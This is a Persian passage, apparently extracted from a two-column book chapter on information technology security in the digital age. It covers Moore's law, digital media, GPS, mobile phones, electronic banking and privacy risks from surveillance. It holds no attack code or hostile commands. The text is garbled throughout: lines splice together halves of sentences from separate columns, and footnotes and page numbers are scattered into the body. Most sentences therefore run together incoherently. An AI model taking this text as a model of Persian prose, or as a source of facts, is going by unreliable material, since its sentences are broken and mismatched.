ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻘﺒﺎﻝ ﮔـﺴﺘﺮﺩﻩ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ
ﻋﺮﺻﻪﻫﺎﻱ ﻧﻮﻳﻨﻲ ﺩﺭ ﺗﺠﺎﺭﺕ ﭘﺪﻳﺪ ﺁﻭﺭﺩ ﻭ ﻧﻘﻄﺔ ﺷﺮﻭﻋﻲ ﺑـﺮﺍﻱ ﺳﻮﻣﻴﻦ ﭘﻴﺎﻣﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﺥ ﺑﻬـﺮﻩﻭﺭﻱ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺻـﻨﺎﻳﻊ
ﺁﻏﺎﺯ ﻋﺼﺮ ﻃﻼﻳﻲ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﺷﺪ. ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﺘﺎﺑﻲ ﭼﺸﻤﮕﻴﺮ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ
ﻳﺎﻓﺖ .ﺑﻪ ﻛﻤـﻚ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﻣﻜـﺎﻥ ﺍﺭﺳـﺎﻝ ﻭ ﺗﺒـﺎﺩﻝ
ﻼ ﺩﻳﺠﻴﺘــﺎﻟﻲ ﻫــﺴﺘﻨﺪ ﻭ
ﺗﺠﻬﻴــﺰﺍﺕ ﺗﻠﻔﻨــﻲ ﻣــﺪﺭﻥ ﺍﻣــﺮﻭﺯ ﻛــﺎﻣ ﹰ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻃﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﺛﺎﻧﻴـﻪ ﻣﻤﻜـﻦ ﺷـﺪﻩ،
ﺳﻴـــﺴﺘﻤﻬﺎﻱ ﻫﺪﻓﻤﻨـــﺪ ﺭﺍﻳﺎﻧـــﻪﺍﻱ ﺟـــﺎﻳﮕﺰﻳﻦ ﺗﺠﻬﻴـــﺰﺍﺕ ﺑﻄﻮﺭﻳﻜﻪ ﻣﺒﺎﺣﺚ ﻭ ﻣﺬﺍﻛﺮﺍﺕ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ
Switchingﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻟﺔ ﻣﻜﺎﻧﻴﻜﻲ ﺷﺪﻩﺍﻧﺪ .ﺍﺯ ﺯﻣﺎﻥ ﭘﻴﺪﺍﻳﺶ ﺍﺯ ﮔﺬﺷﺘﻪ ﭘﻴﮕﻴﺮﻱ ﻛﺮﺩ ﻭ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳﺎﻧﺪ .ﺍﻣﻮﺭ ﺑﺎﺯﺭﮔﺎﻧﻲ ﻛﻪ ﺗـﺎ
ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫـﺔ ۸۰ﻣـﻴﻼﺩﻱ ،ﺻـﺪﺍ ﻭ ﻣﻮﺳـﻴﻘﻲ ﭼﻨﺪﻱ ﻗﺒﻞ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ،ﺗﻠﻜﺲ ﻭ ﺗﻠﻔـﻦ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﺪﻧﺪ
ﺷﻜﻞ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻪ ﺧﻮﺩ ﮔﺮﻓﺘﻪ ﻭ ﺑـﺎ ﭘﻴـﺪﺍﻳﺶ ﻗﺎﻟـﺐ ﻣﻮﺳـﻴﻘﻲ ﺍﻛﻨﻮﻥ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻣﻔﺎﻫﻴﻤﻲ ﻧﻮﻳﻦ ﺩﺭ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺳـﻴﺎﺭ،
MP3ﺩﺭ ﺍﻭﺍﺧــﺮ ﺩﻫــﺔ ۹۰ﻣــﻴﻼﺩﻱ ﺿــﺒﻂ ﺻــﺪﺍ ﺣﺘــﻲ ﺩﺭ ﺳﺮﻳﻌﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣـﻲﺭﺳـﻨﺪ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﭼﺮﺧـﺔ
ﻼ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺩﻧﻴـﺎﻱ ﻣﺤﻴﻄﻬﺎﻱ ﺧﺎﻧﮕﻲ ﻧﻴﺰ ﻛﺎﻣ ﹰ ﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﻋﻜﺎﺳﻲ ﻭ ﻓﻴﻠﻤﺒـﺮﺩﺍﺭﻱ ﻧﻴـﺰ ﺗـﺼﺎﻭﻳﺮ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺩﻭﺭﺑﻴﻨﻬـﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺛﺒﺖ ﺗﺼﺎﻭﻳﺮ ﻓﻴﻠﻤﻬﺎﻱ ﻋﻜﺎﺳﻲ ﮔﺸﺘﻪﺍﻧﺪ. ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﻳﻤﻦ ﻧﮕﺎﻩ ﺩﺍﺷـﺘﻦ ﻣﺤـﻞ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﺟﺪﻳـﺪ ﺍﻟﺰﺍﻣـﻲ
10 Braga, Carlos Prima, Inclusión or Exclusion, ﺍﺳﺖ .ﺻﻨﻌﺖ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯ ﺑﻪ ﺷﺪﺕ ﺩﺭ ﺗﻜﺎﭘﻮﻱ ﻳﺎﻓﺘﻦ ﺭﺍﻫﻲ
UNESCO Courier:
http://www.fcc.gov/Bureaus/Miscellaneous/Ne
ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺧــﻮﺩ ﻫــﺴﺘﻨﺪ ،ﭼﺮﺍﻛــﻪ
ws_Releases/1997/nrmc7020.html ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺁﻥ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ
ﺍﻳﻦ ﻧﺮﺥ ﭘﻴﺸﺮﻓﺖ ﻓﻨﻲ ﻳﻜﻲ ﺍﺯ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗـﺎﻧﻮﻥ Moorﺍﺳـﺖ ﻛـﻪ ۱۱
ﺑﻮﺳﻴﻠﺔ ،Gordon Moorﭘﺪﺭ ﺍﻳﻨﺘﻞ ﺩﺭ ﺩﻫﺔ ۱۹۶۰ﺗﺸﺮﻳﺢ ﺷﺪﻩ .ﺍﻭ ﻧﺎﺷﻲ ﺍﺯ ﻭﺟـﻮﺩ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻧـﺎﺍﻣﻦ ﺩﺭ ﺁﻥ
ﻣﻲﮔﻮﻳﺪ ﻃﻲ ﻫﺮ ﺩﻭﺭﺓ ۲ﺳـﺎﻟﻪ )ﻛـﻪ ﺑﻌـﺪﹰﺍ ﺁﻧـﺮﺍ ﺑـﻪ ۱۸ﻣـﺎﻩ ﻛـﺎﻫﺶ ﺩﺍﺩ( ﻣﻲﺑﺎﺷﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨـﺎﻥ ﻭ ﺍﻋﺘﻤـﺎﺩ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ،
ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻳﻲ ﺑـﺎ ﻇﺮﻓﻴـﺖ
ﺷﺒﻜﻪ ﻭ ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤﻴﻄـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ
ﺩﻭﺑﺮﺍﺑﺮ ﻭ ﻗﻴﻤﺖ ﻳﻜﺴﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺭﻭﻧﺪ ﻃﻲ ۴۰ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ
ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ ﺑﻮﺩﻩ ﻭ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺣﺪﺍﻗﻞ ﺗﺎ ۱۰ﺳـﺎﻝ ﺩﻳﮕـﺮ ﻧﻴـﺰ
ﻫﻤﻴﻨﻄﻮﺭ ﺑﺎﺷﺪ. 9 Online
٢٩ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﻋﻴﺐﻳﺎﺑﻲ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ. ﺍﻣــﺮﻭﺯ ﺣﺘــﻲ ﻓﻴﻠﻤﻬــﺎﻱ ﺳــﻴﻨﻤﺎﻳﻲ ﻭ ﻛﺎﺭﺗﻮﻧﻬــﺎ ﻧﻴــﺰ ﺩﻳﺠﻴﺘــﺎﻟﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ ) ١٣(GPSﻧﻴﺰ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜـﺎﻥ ﺷﺪﻩﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺑﺪﻳﻦ ﺷﻜﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺗﻮﻟﻴـﺪ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﻭ
ﺑﺨﺶ ﺍﻭﻝ
ﺭﺍ ﻣﻲ ﺩﻫﻨﺪ ﻛﻪ ﺑﺪﺍﻧﻴﺪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﺩﺭ ﭼـﻪ ﻣﻜـﺎﻧﻲ ﺭﻭﻱ ﻛـﺮﺓ ﻛﻴﻔﻴﺘﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺳﺖ .ﺭﻓﺘﻪ ﺭﻓﺘﻪ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺟﺎﻱ ﺧـﻮﺩ
ﺯﻣﻴﻦ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﻭ ﺑﺎ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻧـﻲ ﺩﺭ ﺭﺍ ﺑﻪ ﻓﻨﺎﻭﺭﻱ DVDﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻓﻴﻠﻤﻬﺎﻱ ﺳﻴﻨﻤﺎﻳﻲ ﺑـﺎ ﺍﻣﻜﺎﻧـﺎﺕ
ﻛﻨﺎﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺍﺯ ﻧﻘﺸﻪﻫﺎ ﺑﺎﺷﺪ ﻗﺎﺩﺭ ﺑﻪ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﺎﺧﺘﻪ ﻭ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﻧﺪ.
ﻳﺎﻓﺘﻦ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ،ﻧﻘﺎﻁ ﻣﻬﻢ ،ﺭﺳﺘﻮﺭﺍﻧﻬﺎ ،ﺗﺎﺑﻠﻮﻫـﺎﻱ ﺭﺍﻫﻨﻤـﺎ، ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻠﻔﻨﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭﺣـﺎﻝ ﺣﺮﻛـﺖ ﺑـﻪ ﺳـﻤﺖ
ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ،ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻫﺴﺘﻨﺪ ﻭ ﺑﺎ ﻭﺟﻮﺩ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﭼـﻮﻥ ،GSM
ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ. TDMA ،CDMAﻭ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻧﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺟﺎﻳﮕﺰﻳﻦ
ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑـﺎ ﺳـﺮﻋﺘﻲ ﺑـﺎﻭﺭﻧﻜﺮﺩﻧﻲ ﺩﺭ ﺷـﺒﻜﻪ ﻧﺴﻞ ﻗﺪﻳﻤﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺁﻧـﺎﻟﻮﮒ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ .ﺩﺭ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻗﺎﺩﺭ ﺑـﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺗﻠﻮﻳﺰﻳﻮﻥ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻪ ﺻﺤﻨﻪ ﺁﻣﺪﻩ ﺍﺳﺖ
ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺑﺘﺪﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﺻﻮﺕ ﻭ ﺍﻛﻨﻮﻥ ﻗـﺎﺩﺭ ﺑـﻪ ﻭ ﺩﻳﺮﻱ ﻧﺨﻮﺍﻫﺪ ﮔﺬﺷﺖ ﻛﻪ ﺟﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﭘﺨﺶ ﺑﺮﻧﺎﻣـﻪ
ﻣﺒﺎﺩﻟﺔ ﺗﺼﺎﻭﻳﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻲ ﺑﺎﺷـﻨﺪ ﻭ ﺑـﺰﻭﺩﻱ ﺩﺍﺭﺍﻱ ﺭﺍ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ )ﻫﺮﭼﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﻛﻤﻲ ﻛﻨﺪﺗﺮ ﺍﺯ ﺑﻘﻴﻪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ؛
ﻗﺎﺑﻠﻴﺖ GPSﻧﻴﺰ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ ﭼﺮﺍﻛﻪ ﺣﺠﻢ ﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻣﻮﺟﻮﺩ ﻛﻪ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ
ﻣﻌﺮﺽ ﺧﻄﺮ ﻭ ﺣﺎﺩﺛﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﻗﺘـﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﺍﺳﺖ(.
ﺯﻳﺎﺩ ﻭ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﺗﻠﻔﻦ ﻣﻜﺎﻧﻴﺎﺑﻲ ﻛﺮﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛـﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺗﺒــﺪﻳﻞ ﺑــﻪ ﺍﻧــﻮﺍﻉ
ﺍﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺎ ﻗﺮﺍﺭ ﻣـﻲ ﮔﻴﺮﻧـﺪ -ﻣﺜـﻞ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻫﺘﻠﻬﺎ ،ﺁﭘﺎﺭﺗﻤﺎﻧﻬـﺎ ﻭ ﺩﻓـﺎﺗﺮ ﺍﺩﺍﺭﻱ،
ﺧﻮﺩﭘﺮﺩﺍﺯ ﻛﻪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ - ﻛﻠﻴﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﺟـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻞ "ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺷﺒﻜﻪ" ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﻧﻘـﻞ ﻭ ﺩﺍﺩﻩ ﺍﻧﺪ .ﺩﻭﺭﺑﻴﻨﻬﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻴﺎﻥﺑﺎﻧﻜﻲ ﻭ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺍﺑـﺴﺘﮕﻲ ﻧﻈــﺎﺭﺗﻲ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭ ﺗﺄﺳﻴــﺴﺎﺕ ﻧﻴــﺰ ﺍﻏﻠــﺐ ﺍﺯ ﺗﺠﻬﻴــﺰﺍﺕ
ﺯﻳﺎﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻣﺎﻟﻲ ﺩﺍﺭﻧـﺪ ١٤.ﺍﻣـﺮﻭﺯﻩ ﻧﻘـﻞ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ ﻛـﻪ ﺑﺠـﺎﻱ ﺍﺭﺳـﺎﻝ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ
ﺍﻧﺘﻘﺎﻻﺕ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﺑﻪ ﻳﻚ ﻣﺎﻧﻴﺘﻮﺭ ﻭﻳﺪﺋﻮﻳﻲ ،ﺗﺼﺎﻭﻳﺮ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺑـﻪ
ﻣﻴﺴﺮ ﺍﺳﺖ. ١٢
ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ.
ﻲ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﻮﺳﻌﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﻴﻢ ﺑـﺪﻭﻥ
ﻫﻢ ﻓﻮﺍﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ؛ ﻭﻟـﻲ ﻧﻜـﺎﺕ ﻣﻨﻔـﻲ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﻗﺎﺑـﻞ ﻭﺟﻮﺩ ﺭﺍﻳﺎﻧﻪ ،ﺷﺒﻜﻪ ﻭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻗﺎﺑﻞ ﺍﺭﺍﺋﻪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﻣﺸﺎﻫﺪﻩ ﺍﺳﺖ .ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻧﺘﺮ ﺧﻄــﻮﻁ ﻫــﻮﺍﻳﻲ ﻧﻴــﺰ ﺑــﺪﻭﻥ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺯﺭﻭ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ
ﺷﺪﻩ ﺍﺳﺖ .ﺩﻳـﺪﻥ ﺻـﻔﺤﺎﺕ ﺗﺒﻠﻴﻐـﺎﺗﻲ ﻭﺏ ،ﻳـﺎﻓﺘﻦ ﺁﻧﭽـﻪ ﻛـﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﺮﻭﺍﺯ ﻗﺎﺩﺭ ﺑﻪ ﺭﻗﺎﺑﺖ ﺑـﺎ ﻫـﻢ
ﺑﺪﻧﺒﺎﻝ ﺧﺮﻳﺪ ﺁﻥ ﺩﺭ ﻣﻐـﺎﺯﻩﻫـﺎ ﻫـﺴﺘﻴﺪ ،ﻭ ﻣـﺸﺎﻫﺪﺓ ﺁﻧﭽـﻪ ﻛـﻪ ﻧﻴﺴﺘﻨﺪ .ﻫﻮﺍﭘﻴﻤﺎﻫﺎ ﺗﺎ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺎﺩﻱ ﺑﻪ ﺣﺴﮕﺮﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ
ﺩﺭﺣﺎﻝ ﺗﻤﺎﺷﺎ ﻳﺎ ﺧﻮﺍﻧﺪﻥ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﻫﺴﺘﻴﺪ ﻧﻴﺰ ﺳـﺎﺩﻩﺗـﺮ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻭ ﺑﺪﻭﻥ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺧﻮﺑﻲ
ﻗﺒﻞ ﻣﻲﺑﺎﺷﺪ .ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﻈﺎﺭﺗﻲ ﺑـﺮ ﻣﻨـﺎﻓﻊ ﺷـﻤﺎ ﺣـﺎﻛﻢ ﺑﺎﺷـﺪ ﻛﺎﺭ ﻛﻨﻨﺪ .ﺣﺘﻲ ﺍﺗﻮﻣﺒﻴﻠﻬﺎ ﻧﻴﺰ ﺑﺮﺍﻱ ﻋﻤﻠﻜﺮﺩ ﻣﻨﺎﺳﺐ ﻭ ﻛﻤﻚ ﺑـﻪ
ﻗﺎﻋﺪﺗﹰﺎ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﺑـﺎﺧﺒﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺷـﺪ ،ﺍﻣـﺎ ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ ﺷـﻤﺎ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﻛـﻪ ﺍﺯ اﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺎﻏﻞ ﺭﺍ ﺑﻪ ﺳﻤﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ۱۲
ﺗﻮﺳﻌﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ .ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺗﺼﺎﻭﻳﺮ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺠﻴﺘﺎﻝ ﺩﺭﺁﻳﻨﺪ
ﻭ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈـﺎﺭﺕ ﺩﺭ
13 Global Positioning System ﻫﺮ ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ .ﺑﻨﺎﺑﺮ ﭘﻴﺶﺑﻴﻨﻲﻫﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﻣﻨﻴﺘﻲ
